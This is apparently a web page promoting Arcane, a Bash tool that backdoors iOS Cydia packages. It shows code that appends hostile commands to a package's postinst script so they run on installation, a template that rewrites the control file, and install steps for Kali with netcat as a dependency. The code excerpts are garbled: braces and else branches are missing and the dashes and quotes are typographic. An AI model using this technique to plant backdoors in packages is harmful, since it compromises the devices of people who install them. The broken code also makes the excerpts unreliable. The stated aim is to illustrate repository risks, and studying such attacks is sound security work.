Arcane is a simple script tool to backdoor iOS packages (iPhone ARM) and create the necessary resources for APT repositories. It was created to help
Arcane is a simple script tool to backdoor iOS packages (iPhone ARM) and create the necessary resources for APT repositories.
It was created to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
How Arcane Tool To Backdoor iOS Package Works
It’s possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the
preinst, postinst, prerm, and
postrm files. Arcane takes advantage of the
postinst file to execute commands during the installation.
# The “post-installation” file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It’s utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the file.
# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
# If –file is used, `cat` the command(s) into the postinst file.
if [[ “$infile” ]]; then
cat “$infile” >> “$postinst”;
# If no –file, utilize the simple Bash payload, previously
echo –e “$payload” >> “$postinst”;
embed=“generic shell command”;
status “embedded $embed into postinst” “error embedding backdoor”;
chmod 0755 “$postinst”
control file contains values that package management tools use when installing packages. Arcane will either modify an existing
control or create it.
# The “control” file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
Name: $hacker backdoor
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>”;
# An `if` statement to check for the control file.
if [[ ! –f “$tmp/DEBIAN/control” ]]; then
# If no control is detected, create it using the template.
echo “$controlTemp” > “$tmp/DEBIAN/control”;
status “created control file” “error with control template”;
# If a control file exists, Arcane will simply rename the package
# as it appears in the list of available Cydia applications. This
# makes the package easier to location in Cydia.
msg “detected control file” succ;
sed –i ‘0,/^Name:.*/s//Name: $hacker backdoor/’ “$tmp/DEBIAN/control”;
status “modified control file” “error with control”;
How to install Arcane Tool To Backdoor iOS Packages
Recommended for Kali v2020.3:
sudo apt–get update; sudo apt–get install –Vy bzip2 netcat–traditional dpkg coreutils # dependencies
sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
sudo chown $USER:$USER –R /opt/arcane/; cd /opt/arcane
chmod +x arcane.sh;./arcane.sh —help
You can download Arcane here:
Or read more here.